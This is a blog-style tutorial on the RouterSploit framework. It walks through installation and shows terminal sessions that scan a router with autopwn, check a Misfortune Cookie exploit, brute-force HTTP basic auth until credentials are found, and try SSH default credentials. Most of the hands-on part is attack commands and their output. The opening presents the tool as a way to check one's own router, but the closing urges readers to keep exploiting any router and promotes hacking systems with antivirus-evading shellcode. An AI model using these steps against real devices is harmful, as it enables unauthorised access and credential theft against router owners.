Routersploit is a tool similar to Metasploit but designed for the router.In this modern age of smart devices, as their number is growing the need of their security check for the vulnerability is also expanding.The companies are patching their products for security which are known as a security update.While most of the internet users only update their PC but forget about their router which is your gateway to the internet.Routers are the first devices which are exposed to the Internet openly and this protects your device from the darkness of the web using its firewall.Hence it’s become necessary to update their firmware regularly.
This article on routersploit will make you an expert on finding vulnerability of your router or any router.
So let’s get started,
About routersploit
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aid penetration testing operations:
exploits – modules that take advantage of identified vulnerabilities.
RouterSploit currently has support to a limited number of exploits, but they can be extended easily from popular exploit database online.
Creating Routersploit modules is very easy so that everyone can contribute to this excellent project.
The full process is described in RouterSploit Wiki.
In the wiki, you can find a code skeleton and all the necessary classes for module development.
The exploit stage in RouterSploit works pretty similar to Metasploit.
Anyone who had worked with Metasploit will find himself at home with RouterSploit.
Picking the desired exploit, eased with command completion leads to exploit configuration section after which we run our exploit.
RouterSploit also provides info about the exploits and the short description.
It is also possible to check if the target is vulnerable to particular exploit before you start the exploitation process
creds – modules designed to test credentials against network services
This allows you to run a brute force attack using dictionary on various network protocols like,
- FTP
- ssh
- telnet
- HTTP basic auth
- HTTP form auth
This module is again classified into categories of two with default credentials and using a custom dictionary.
scanners – modules that check if a target is vulnerable to any exploit
This allows you to check whether any exploit module is vulnerable to your selected target.
Installing Routersploit
git clone https://github.com/reverse-shell/routersploit
./rsf.py
Scanner
rsf > Use scanner/autopwn rsf (AutoPwn) > Show Options rsf (AutoPwn) > Set target (IP) rsf (AutoPwn)> run This scanner scan the target with popular exploits and list the exploits that are vulnerable
·Modules
To use a module type
rsf > use exploits/multi/misfortune_cookie rsf (Misfortune Cookie) > show options Target options: Name Current Settings Description ---- ---------------- ----------- port 80 Target port target Target address e.g. http://192.168.1.1
rsf (Misfortune Cookie) > set target 192.168.0.1 [+] {'target': '192.168.0.1'} rsf (Misfortune Cookie) > check [+] Target is vulnerable rsf (Misfortune Cookie) > |
·Credentials(Brute Force)
This method can be used when the module
rsf > use creds/http_basic_bruteforce rsf (HTTP Basic Bruteforce) > show options Target options: Name CurrentSettings Description ---- --------------- ----------- port 80 target port target Target IP address or file with target:port (file://) Module options: Name Current settings Description ---- ---------------- ----------- path / URL Path usernames admin Username or file with usernames (file://) passwords file:///usr/share/routersploit/routersploit/wordlists/passwords.txt Password or file with passwords(file://) threads 8 Numbers of threads verbosity yes Display authentication attempts rsf (HTTP Basic Bruteforce) > set target 192.168.0.2 [+] {'target': '192.168.0.2'} rsf (HTTP Basic Bruteforce) > set passwords file:///usr/share/wordlists/nmap.lst [+] {'passwords': 'file:///usr/share/wordlists/nmap.lst'} rsf (HTTP Basic Bruteforce) > set verbosity no [+] {'verbosity': 'no'} rsf (HTTP Basic Bruteforce) > run [*] Running module... [*] Elapsed time: 1.97385120392 seconds [+] Credentials found! Target Port Login Password ------ ---- ----- -------- 192.168.0.2 80 admin password rsf (HTTP Basic Bruteforce) > |
For SSH:
rsf > use creds/ creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce rsf > use creds/ssh_default rsf (SSH Default Creds) > rsf (SSH Default Creds) > show options Target options: Name Current settings Description ------- -------------------- ------------ target Target IP address port 22 Target port
Module options: Name CurrentSettings Description ---- --------------- ----------- threads 8 Numbers of threads defaults file:///root/git/routersploit/routersploit/wordlists/defaults.txt User:Pass or file with default credentials (file://) rsf (SSH Default Creds) > set target 192.168.1.53 [+] {'target': '192.168.1.53'} rsf (SSH Default Creds) > run [*] Running module... [*] worker-0 process is starting... [*] worker-1 process is starting... [*] worker-2 process is starting... [*] worker-3 process is starting... [*] worker-4 process is starting... [*] worker-5 process is starting... [*] worker-6 process is starting... [*] worker-7 process is starting... [-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000' [-] worker-1 Authentication failed. Username: '1234' Password: '1234' [-] worker-0 Authentication failed. Username: '1111' Password: '1111' [-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP' [-] worker-3 Authentication failed. Username: '266344' Password: '266344' [-] worker-2 Authentication failed. Username: '1502' Password: '1502' (..) |
Routersploit is a great tool for finding vulnerabilities in any router and exploiting it
so find vulnerabilities and keep exploiting them and to know how to hack any Operating System using shell code generator, which is mostly undetected by antivirus software read the article on How To Hack Into Android & Systems Using Venom?
Happy Hunting…